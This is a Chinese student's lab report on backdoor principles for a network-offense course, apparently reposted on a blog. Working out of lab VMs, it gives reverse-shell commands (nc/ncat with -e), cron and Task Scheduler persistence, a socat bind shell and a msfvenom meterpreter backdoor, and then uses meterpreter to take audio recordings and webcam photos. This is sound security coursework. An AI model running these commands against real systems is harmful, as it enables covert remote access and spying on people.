1. 程式人生 > >20154324 劉康權 《網絡對抗》Exp2 後門原理與實踐

20154324 劉康權 《網絡對抗》Exp2 後門原理與實踐

nsh png netcat nta vim編輯 時間 clas 自己的 rontab

一、實踐目標與內容

1.學習內容

  • 使用nc實現win,mac,Linux間的後門連接
  • meterpreter的應用
  • MSF POST 模塊的應用

2.學習目標

  • 學習建立一個後門連接,並了解其中的知識點,同時熟悉後門連接的功能。通過親手實踐並了解這一事實,提高自己的安全意識 。

3.概念

  • 後門就是不經過正常認證流程而訪問系統的通道。
  • netcat是一個底層工具,進行基本的TCP UDP數據收發。常被與其他工具結合使用,起到後門的作用。
  • socat是ncat的增強版,它使用的格式是socat [options]
  • 其中兩個address是必選項,而options 是可選項。socat的基本功能就是建立兩個雙向的字節流,數據就在其間傳輸,參數address就是代表了其中的一個方向。所謂流,代表了數據的流向,而數據則可以有許多不同的類型,命令中也就相應需要許多選項對各種不同的類型數據流進行限定與說明。

二、實踐步驟:常用的後門工具的應用

1.Windows獲得Linux Shell

1.1查看win7和linux的ip地址

技術分享圖片
技術分享圖片

1.2windows打開監聽

ncat.exe -l -p 4324

1.3Linux反彈連接windows

nc 192.168.211.130 4324 -e /bin/sh

1.4windows下獲得linux shell,運行指令

技術分享圖片

2.Linux獲得Windows Shell

2.1Linux打開監聽

nc -l -p 4324

2.2Windows反彈連接Linux

ncat.exe -e cmd.exe 192.168.211.129 4324

2.3Linux下看到Windows的命令提示

技術分享圖片

3.使用nc傳輸數據

3.1Windows下監聽4324端口

ncat.exe -l -p 4324

3.2Linux下連接到Windows的4324端口

nc 192.168.211.129

3.3建立連接成功之後,進行字符串的傳輸

技術分享圖片
技術分享圖片

4.使用netcat獲取主機操作Shell,cron啟動

4.1先在Windows系統下,監聽4324端口

nc -l -p 4324

4.2在Linux環境下,使用man crontab指令查看crontab命令的幫助文檔,從文檔中我們可以知道crontab指令可以用於設置周期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab文件中,以供之後讀取和執行。

技術分享圖片

4.3用crontab -e指令編輯一條定時任務,選擇編輯器時選擇基本的vim編輯器

4.4在最後一行添加44 * * * * /bin/netcat 192.168.15.131 4312 -e /bin/sh,意思是在每個小時的第44分鐘反向連接Windows主機的4324端口,因為當時的時間是17:53,所以設置成44,這樣,過一分鐘就能看到效果了

技術分享圖片

4.5在17:54的時候,獲得了Linux的shell

技術分享圖片

5.使用socat獲取主機操作Shell, 任務計劃啟動

5.1在Windows系統下,打開控制面板,搜索任務計劃,進去後就可以開始創建任務,填寫任務名稱後,新建一個觸發器。

技術分享圖片

5.2在操作->程序或腳本中選擇socat.exe文件的路徑,並在添加參數一欄填寫++tcp-listen:4324 exec:cmd.exe,pty,stderr++,這個命令是為了把cmd.exe綁定到端口4324,同時把cmd.exe的stderr重定向到stdout上

技術分享圖片

註意:參數之間用空格或者 :隔開!

5.3創建之後,右鍵任務直接運行

5.4 在Linux環境下輸入指令,這裏的第一個參數代表標準的輸入輸出,第二個流連接到Windows主機的4324端口,此時可以發現已經成功獲得了一個cmd shell

socat - tcp:192.168.211.129:4324
技術分享圖片

6.使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

6.1在Linux環境下生成後門程序20154324_backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211.130 LPORT=4324 -f exe > 20154324_backdoor.exe
技術分享圖片

6.2通過nc指令將生成的後門程序傳送到Windows主機上,Linux的nc指令在上圖

  • nc 192.168.211.129 4324 < 20154324_backdoor.exe
  • ncat.exe -l 4324 > 20154324_backdoor.exe
    技術分享圖片

6.3在Linux上使用++msfconsole++指令進入msf控制臺,使用監聽模塊,並設置payload以及反彈回連的IP和端口:

技術分享圖片
技術分享圖片

6.4在設置完成後,在Linux環境執行監聽

技術分享圖片

6.5在Windows環境打開後門程序20154324_backdoor.exe,此時可以看到在Linux環境下已經獲得了Windows主機的連接,並且得到了遠程控制的shell

技術分享圖片

7.使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

7.1在前一次實踐中已經獲取主機Shell的前提下,進行錄音並保存

技術分享圖片

7.2獲取攝像頭權限進行照相並保存

技術分享圖片

三、問題回答

1.例舉你能想到的一個後門進入到你系統中的可能方式?

  • 通過這次實踐,我意識到有許多方式可以設置後門進入我的系統,我覺得最有可能存在後門的就是非官方下載的軟件,這裏面很有可能存在後門,使得其他人可以進入我的系統,還有就是可以在許多可執行文件中設置後門。

2.例舉你知道的後門如何啟動起來(win及linux)的方式?

  • 我認為當設置後門的可執行軟件執行到啟動後門的特定步驟時,後門就會啟動。或者偽裝成一種服務,當用戶啟用服務時,就會啟動後門。在Linux下,通過cron設置定時任務,到了特定時間就會有獲得一個shell。而在windows下,通過設置任務計劃,設置相應條件,滿足條件就會實現啟動後門,

3.Meterpreter有哪些給你映像深刻的功能?

  • 它的msfvenom指令可以編寫可執行的後門程序,甚至可以設置反彈回連的IP、回連的端口和文件的類型,在通過nc傳輸後可以實現後門的功能。還有就是它的help語句,可以查看各種命令以及相應的用途。最讓我震驚的就是還能進行錄音、攝像,以後我一定要把攝像頭蓋住了。

4.如何發現自己有系統有沒有被安裝後門?

  • 我想到的第一個辦法就是用殺毒軟件,哈哈,但通過這次實踐,我認為我們還可以通過掃描端口,查看端口是否存在綁定後門程序等問題。

四、心得體會

在這次實踐中,我們學習了後門的基本原理及它的運行過程,但最重要的還是實現了簡單的後門連接,而在這次實踐中,我們運用的應用程序中的後門,或者可以說偽裝為特定應用的專用後門程序,我感覺我的電腦中很有可能就存在後門程序。同時我也見識到了後門的厲害,可以實現許多功能,甚至還能實現一些我自己都沒用過的功能。一定要認真學習好網絡對抗,至少要保護好自己的系統。

五、存在的問題

1.兩個虛擬機無法實現連接

  • 解決方法:改變虛擬機的網絡連接方式為NAT模式,並進行相應的設置。

2.無法實現虛擬機的攝像功能

  • 解決方法:在VMware中,點擊虛擬機中的可移動設備進行連接,啟動虛擬機的攝像功能。

20154324 劉康權 《網絡對抗》Exp2 後門原理與實踐